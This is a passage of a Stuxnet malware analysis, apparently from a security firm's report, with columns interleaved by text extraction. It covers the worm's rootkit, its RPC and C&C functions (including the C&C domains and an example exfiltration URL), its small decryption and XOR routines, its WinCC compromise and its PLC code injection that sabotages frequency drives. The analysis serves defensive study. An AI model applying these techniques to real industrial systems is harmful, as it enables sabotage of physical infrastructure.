drive, network or SQL). As has previously been Function 1: infect removable media and launch the
explained, the malware uses four zero-day Windows RPC server;
vulnerabilities to spread via different vectors (USB and Function 2: intercept the calls to certain functions in
local network). All of these techniques are used to order to infect .S7P and .MCP files corresponding to
install it on a system. In the most widespread case of Step7 projects;
infection by opening a directory present on a USB drive, Function 4: initiate the Stuxnet uninstallation
the exploitation of the LNK vulnerability launches procedure;
execution of the main module.
Function 5: check that the rootkit (the kernel driver
MrxCls.sys) is correctly installed;
Functionalities provided Functions 6 and 7: return the version of Stuxnet
installed;
Among other things, execution of this module launches Functions 9, 10 and 31 (13?): update the malware
a rootkit to hide the malicious files present on the USB from Step7 files
drive. For this, certain system functions associated with Function 14: infect Step7 files;
the shared libraries "ntdll.dll" and "kerneI32.dll" are
Function 15: point of entry for the system-infection
intercepted so that code can be injected, and to hide
routine;
the presence of various malicious files based on
specific criteria (".lnk" with a size of 1,471 bytes and Function 16: infect the system (installation of drivers,
"WTRabcd.tmp" files for which the sum of a, b, c and d DLLs, resources, code injection, etc.);
modulo 10 is equal to 0). Function 17: replace a Step 7 DLL so as to be able to
intercept the calls to certain functions; Function 18:
The malware is capable of injecting executable code complete uninstallation of the malware; Function 19:
into running processes or into another process whose infect a USB drive;
name corresponds to that of an antivirus program. Function 22: infect remote systems via the local
These operations mean that it is not necessary to load network;
a file that would risk being detected by an antivirus
Function 24: check the Internet connection;
program.
Function 27: RPC server;
Function 28: dialogue with the command and control
(C&C) server;
Function 29: dialogue with the C&C server and
exakta

execute the code returned;
Function 32: RPC server used by the service server
to respond to certain RPC calls;

Several network functionalities are implemented within
the malware. Among these are the RPC client and
server. P2P communications and the use of a C&C are
mainly used to keep the malware up to date and to
recover information. Nevertheless, these could be used
to download and install other malware or to exfiltrate
WWW.XMCO.FR

sensitive information stolen from the compromised
system.

Several other functionalities useful to the malware's



Installation of an RPC server
#decrypt function on python
def decrypt(key, counter, sym):
The RPC server is subdivided into two components for v0 = key * counter
managing local and remote RPC calls. For this, Stuxnet v1 = v0 >> 0xb
infects different processes according to the type of RPC v1 = (v1 ^ v0) * 0x4e35
call to be managed: "services.exe" for "local" calls, or v2 = v1 & 0xffff
one of the processes "netsvc", "rpcss" or "browser" for v3 = v2 * v2
v4 = v3 >> 0xd
remote RPC calls. The various RPC methods are as v5 = v3 >> 0x17
follows: xorbyte =
((v5 & 0xff) + (v4 & 0xff)) & 0xff
Method 1: returns the version of Stuxnet; xorbyte = xorbyte ^ ((v2 >> 8) &
Method 2: loads the module passed as a parameter 0xff)
xorbyte = xorbyte ^ (v2 & 0xff)
in a new process and executes the specified exported return xorbyte ^ sym
function;
Method 3: loads the module passed as a parameter
into the memory space of the current process and calls
the first exported function; This file contains several items of information, such as
Method 4: loads the module passed as a parameter the list of servers used to check the Internet connection
into a new process and executes it; ("www.windowsupdate.com", "www.msn.com"), the list
Method 5: creates a "dropper" and sends it to a of C&C servers ("www.mypremierfutbol.com",
"www.todaysfutbol.com"), the dates and times of
compromised system;
activation and deactivation of the worm, after which the
Method 6: executes the specified application;
worm installs itself automatically using the previously-
Method 7: reads the data from the specified file; mentioned functions, the version of the malware, the
Method 8: writes the data into the specified file; minimum number of files that a USB drive must contain
Method 9: deletes a file; to be able to be infected using malicious LNK files, and
Method 10: performs various tasks from the names of lastly, other ancillary information used for the correct
files intercepted using the "hooks" installed by "Method functioning of the worm and its propagation.
2", and writes the information into a log file.

It appears that the last three methods implemented are Concerning the functioning mode of the C&C servers,
not used by Stuxnet. an instance of Stuxnet does not exchange plaintext
messages with the two previously-mentioned servers.
Thanks to this mechanism based on RPC which can be Each of the messages sent over the Internet to the
used within the context of P2P communications, servers is encrypted using a very simple algorithm. This
Stuxnet is, among other things, able to update itself on is a simple XOR with the following 31-byte key:
a local network from another compromised system.
// Encryption
char Key[31] = { 0x67, 0xA9, 0x6E,
C&C communications 0x28, 0x90, 0x0D, 0x58, 0xD6,
0xA4, 0x5D, 0xE2, 0x72,
The second functionality related to the network is a 0x66, 0xC0, 0x4A, 0x57,
0x88, 0x5A, 0xB0, 0x5C,
module for communicating with one of the command 0x6E, 0x45, 0x56, 0x1A,
and control (C&C) servers. Like the "P2P over RPC" 0xBD, 0x7C, 0x71, 0x5E,
function, the module allows a compromised system to 0x42, 0xE4, 0xC1 } ;
load malicious code into memory and execute it.
// Encryption procedure
void EncryptData(char *Buffer, int
The list of command and control servers is specified in
WWW.XMCO.FR

BufferSize, char *Key)
the "%WINDIR% configuration file infmdmcpq3.pnf". {
This file of 1,860 bytes may be decrypted with the for (int i = 0 ; i <
following function: BufferSize ; i ++)
Buffer[i] ^= Key[i % 31];
return ;
}



The structure of a message sent by the malware is Stuxnet's block of configuration data. Lastly, a specially-
quite complex. It contains much information specific to designed DLL is placed in the multiple sub-directories of
the victim. Among this is information related to the the directory "hOmSave7".
network interfaces, the version of the OS and of the
malware. This message is simply sent to a server that The infection mechanism is relatively simple. When the
sends an HTTP GET request to one of the URLs listed project is opened using WinCC Simatic Manager, the
in the configuration file. For example: http:// DLL placed in the sub-directories of the directory
www.mypremierfutbol.com/index.php? "hOmSave7" is automatically sought. When this is
data=STUXNET_CC_MESSAGE. loaded, the library decrypts the protected data and
loads the malware's main component into memory to
In response to this request, the server returns a complete the process of infection.
message composed of several items: a size coded over

“Lastly, to maximize the efficiency of the
4 bytes, a flag coded over 1 byte and lastly an
executable image. If the size of the received message
does not correspond to the indicated size of the image
+ 5 bytes, the malware ignores this response. If the size proliferation operation, the malware
corresponds, according to the value of the flag, the searches for the WinCC software. When it is
malware loads the executable image into the memory discovered, Stuxnet connects to the
space of the current process or into another process database used by the software using a
using one of the dedicated RPC methods, then
executes it. standard hard-coded password.”

It nevertheless appears that this important functionality
has not really been used, neither to update the software Persistence
nor to install additional malicious tools. It nevertheless
acts as a hijacked port. The rapid blocking of the To ensure the persistence of the functionalities
d o m a i n s w w w. m y p r e m i e r f u t b o l . c o m e t previously installed, Stuxnet nevertheless has to
www.todaysfutbol.com perhaps had a role in this. profoundly modify the system. This is because it is not
possible to inject code into arbitrary processes or to
sustainably hide files in the user area without profound
Seeking and infecting the WinCC environment modifications to the system.
Two system drivers signed with private keys
Lastly, to maximize the efficiency of the proliferation corresponding to certificates belonging to Realtech and
operation, the malware seeks the WinCC software. JMicron are therefore installed using the elevated
Once it is discovered, Stuxnet connects to the privileges obtained from the two proofs of concept
database used by the software, using a standard hard- (Keyboard Layout and Task Scheduler). "MrxCls.sys" is
coded password. Once connected to this database, the used to inject code into a process. "MrxNet.sys" is a
malware sends the malicious code via SQL requests, rootkit for hiding the malicious files used to exploit the
then executes it. LNK vulnerability. In contrast to the rootkit used in the
user area, this one is persistent.
This first action compromises the MSSQL server.
Then, the malware modifies the SQL views defined on The fact that these last are signed with stolen
the server to force the execution of code each time certificates means that they can be more discreetly
these views are accessed. installed so as not to arouse the user's suspicions
(signature essential for installing drivers under Windows
Stuxnet is at last capable of infecting WinCC / Step7 7/Windows Vista). The ".lnk" files with a size of 1,471
projects associated with WinCC Simatic Manager. The bytes, and the "WTRabcd.tmp" files, for which the sum
files that are sought and modified have the of a, b, c and d modulo 10 is equal to 0 are filtered so
WWW.XMCO.FR

extensions .S7P, .MCP or .TMP. Under certain specific that they are not displayed by the file explorer. This filter
conditions, files with the names "xutilslisten is active only for the file systems NTFS, FAT and CDFS.
xr000000.mdx", "xutilslinkss7p00001.dbf" and "xutils After being registered using the function
listens7000001.mdx" or "GracScc_alg.sav", "GracS "FileSystemRegistrationChange()", the driver is called
db_log.sav" and "GracScc_alg.sav" are deposited. In each time a file system is mounted and can therefore
both cases, these files correspond respectively to an monitor the requests that are sent to it. Thus, the driver
encrypted version of the malware's main DLL, to a data can act with complete impunity and choose which files
file of 90 bytes and lastly, an encrypted version of to display in a directory.



1: The pirate manages to infect a USB drive used by a person working on a computer connected to the target
information system.

2: The person uses their USB drive within the target information system's LAN.

3: After having infected a Windows workstation, Stuxnet seeks to spread across the LAN.

4: Sutxnet contacts its C&C server.

5: An employee whose USB drive has been contaminated connects to a workstation equipped with WinCC software
and belonging to an industrial network.

6: When this contaminated workstation connects to a PLC, Stuxnet deposits the malicious code corresponding to PLC 0

7: The malicious code sends speciﬁc orders to the variable frequency drives.
WWW.XMCO.FR

7 bis: The person responsible for supervising the equipment cannot identify the presence of Stuxnet.



The resources embedded by Stuxnet keyboard layout (Keyboard Layout) (MS10-073)
" " " " " The following exports were observed by Symantec in
The two previously-mentioned drivers correspond the older versions of Stuxnet, but have disappeared in
respectively to resources 201 and 242 of the main the "latest" conversions:
module. Eleven other resources are also available,
Resource 207: Information related to the exploitation
such as an executable module PE (210), a link file LNK
of a vulnerability using Autorun.inf.
(240), and a block of configuration data for the driver
"MrxCls.sys" (205) Resource 231: Resource used to check whether the
system is connected to the Internet or not.
Resource 201: driver "MrxNet.sys" signed using
certificates belonging to RealTech or JMicron;
Resource 202: DLL used in compromising Step 7

INFO
projects;
Resource 203: CAB file containing an equivalent of
resource 202 used for compromising WinCC projects;
Resource 205: encrypted configuration-data file for Definitions
the driver "MrxCls.sys";
Resource 208: shared library "s70tbldx.dll" usurping PLC : Programmable Logic Controller
the functions of the original Siemens DLL; Resource
209: file of 25 bytes containing encrypted data Large-scale remote-control system for
deposited in "%WINDIR%help winmic.fts"; the real-time processing of a large
number of remote measurements and for
Resource 210: model of PE file used for creating or remotely controlling technical
injecting executables ("-WTR4132.TMP"); Resource facilities. It is an industrial
221: malicious code used for exploiting the security technology in the field of
vulnerability present in the server service (MS08-067) instrumentation. A programmable
Resource 222: malicious code used for exploiting the controller is a programmable electronic
device for controlling industrial
security vulnerability present in the print spooler processes by sequential processing. It
(MS10-061) sends orders towards the preactuators
Resource 240: model LNK file (operative section or operative section
on the actuator side) from input data
(sensors) (control section or control
section on the sensor side),

“To ensure the persistence of the
instructions and a computer program.

functionalities previously installed, Stuxnet
SCADA : Supervisory Control And Data
nevertheless has to profoundly modify the Acquisition (télésurveillance et
system. This is because it is not possible to acquisition de données)
inject code into arbitrary processes or to Large-scale remote-control system for
sustainably hide files in the user area the real-time processing of a large
without profound modifications to the number of remote measurements and for
remotely controlling technical
system ... ” facilities. It is an industrial
technology in the field of
instrumentation.

Resource 241: "-WTR4141.TMP", DLL used for
WWW.XMCO.FR

loading the executable corresponding to resource 221 "-
WTR4132. TMP" responsible for installing malware
(dropper)
Resource 242: Driver "Mrxnet.sys" (Rootkit) used to
mask the presence of certain files
Resource 250: Malicious code used to exploit the
security vulnerability present in the management of the



Phase 3: Attack on industrial systems equivalent functions in "s70tbxsx.dll".

Detection of SCADA systems based on WinCC The 16 functions whose behavior is altered correspond
to the methods for reading ("s7blk_read"), writing
Once the Windows system has been compromised and ("s7blk_write"), enumeration ("s7blk_findfirst" and
the malware installed, the third phase of the attack can "s7blk_findnext") and deletion ("s7blk_delete") of the
begin. This corresponds to the search for certain blocks of code present on the PLC. It is by modifying
specific software. To access the SCADA system, the certain key functions of this library that the attackers
authors of the malware have chosen to go via the ensure the sustainability and discretion of their attack.
development tools associated with the target system: To avoid detection when an operator first connects to a
Step7 and WinCC. These two tools are respectively compromised PLC, the "read" and "enumeration"
used to develop programs operating on systems of the functions hide certain blocks of code from the operator
PLC type and to check their correct functioning. and only return the original "healthy" code.
Incidentally, these tools are potentially the only point of
entry to these sensitive systems, given that they are not But not all PLCs are targeted. Stuxnet, using two
supposed to be connected to the Internet, but rather to threads launched by the malicious library, searches for
a network dedicated to them. precisely two types of appliance with the references
Siemens 6ES7-315-2 and 6ES7-417. The main
To carry out this third phase of the attack, the malware difference between these two models of controller is the
searches for and replaces the shared library quantity of embedded memory. 256 KB for the series
"s7otbxdx.dll". This library, which comes from the S7-315 against 30 MB for the series S7-417.
Simatic software suite from Siemens, is used in order to
have a PC running on Windows communicate with a Module 315
PLC from the Simatic family. Usually, a developer
programs their equipment with one of the numerous Secondly, in the configuration targeted by the malware,
programming languages interpreted by the software the PLCs of series 300 (6ES7-315-2) must use between
suite, such as STL or SCL. This is subsequently one and six Profibus CP 342-5 modules to
compiled into a specific assembler code called "MC7", communicate with the systems under their control.
before being loaded on the PLC. Once again, only certain identification numbers are
sought. In the case of Stuxnet, these are the Profibus
By renaming the shared library "s70tbxdx.dll" as identification numbers "7050h" and "9500h". These
"s70tbxsx.dll", then by placing its own version of the numbers uniquely identify the models of these items of
library "s70tbxdx.dll", the malware is able to intercept all equipment, which are known as "frequency converter
calls to the functions exported by the original library and drives" or "variable frequency drives". The
to manipulate them at will. In fact, only the behavior of corresponding products are the "KFC750V3"
several functions is affected. Most of the calls to the manufactured by Fararo Paya based in Teheran in Iran,
functions of "s70tbxdx.dll" are directly sent to the and the "Vacon NX" from Vacon based in Finland.

WWW.XMCO.FR



Subsequently, the system goes into a state machine
Variable frequency drives are generally used to control clearly described by Symantec. The transition between
the speed of other components such as motors. each state is governed by timers, tests or by the end of
other tasks. Approximately, the system collects data for
Finally, the last criterion sought is the presence of at a period of between 13 days and three months, before
least 33 variable frequency drives among the two sending falsified data on the communication bus for
models previously mentioned. about 50 min, then returning to the initial state.

If these various extremely precise conditions are According to Symantec's study, the system uses
fulfilled, the process of infection begins by the DP_RECV to inspect the messages sent by the variable
modification of certain blocks of code such as frequency drives, which contains specific information
DP_RECV, OB1 and OB35. These blocks of code are corresponding to the current operating frequency.
infected by overwriting or by increasing their sizes in Lastly, this attack allows a pirate who has successfully
order to introduce the malicious code at the beginning injected their malicious code to withdraw the control that
of the block. These operations ensure that the added the legitimate blocks of code had on the data
code is executed when the block in question is called. transmitted during the phase nicknamed
The functions FC1865 and FC1874 are therefore "deadfoot" ("DEADF007" in the code). This phase
respectively injected into blocks OB1 and OB35. corresponds to 50 min during which the PLC sends
Note: DP_RECV corresponds to the function in charge semi-arbitrary information to the various variable
of managing the reception of data on the bus. frequency drives through the Profibus modules. The
OB1 corresponds to the main function, which is messages sent correspond to frequencies that must be
continuously executed. converted into rotation speeds by the variable
OB35 corresponds to a timer executed every 100 ms. frequency drives. Furthermore, execution of the
legitimate code is prevented using a call to the
In reality, Stuxnet may infect systems that correspond command BEC (Conditional Block End) instead of
to its selection criteria in different ways. This is letting the execution of the program continue. Without
because two sequences of malicious code exist and
may be used to infect a plc according to the distribution
of the products that are controlled. The first sequence,
referenced A by Symantec, is selected when there is a
majority of Vacon appliances. The second sequence,
referenced B by Symantec, is used when a majority of
Fararo Paya variable frequency drives are present.
In all cases: the module 315 is designed to allow a PLC
6ES7-315-2 to control up to six Profibus "masters" each
controlling 31 "slave" converters, each on their
dedicated Profibus network.
Finally, the attack 315, which corresponds to about
3,000 lines of STL code accompanied by 4 blocks of
data (DB888, DB889, DB890 and DB891), is organized
as follows:

The code block DP _RECV is copied to the address
FC1869, then replaced by malicious code which itself
calls the original code that was moved.

Each time a variable frequency drive sends data to a
PLC 6ES7-315-2 via the Profibus CP 342-5 module, its
WWW.XMCO.FR

data is transferred to the original code before being
reprocessed by the added malicious code.

Each of the messages to be processed must be in a
specific format when it is examined by DP _RECV.
Namely, it must be composed of 31 records of 28 or 32
bytes corresponding to each of the converters.


Stuxnet. analysis, myths, realities

Stuxnet. analysis, myths, realities

Empfohlen

Empfohlen

Weitere ähnliche Inhalte

Ähnlich wie Stuxnet. analysis, myths, realities

Ähnlich wie Stuxnet. analysis, myths, realities (20)

Mehr von Yury Chemerkin

Mehr von Yury Chemerkin (20)

Kürzlich hochgeladen

Kürzlich hochgeladen (20)

Stuxnet. analysis, myths, realities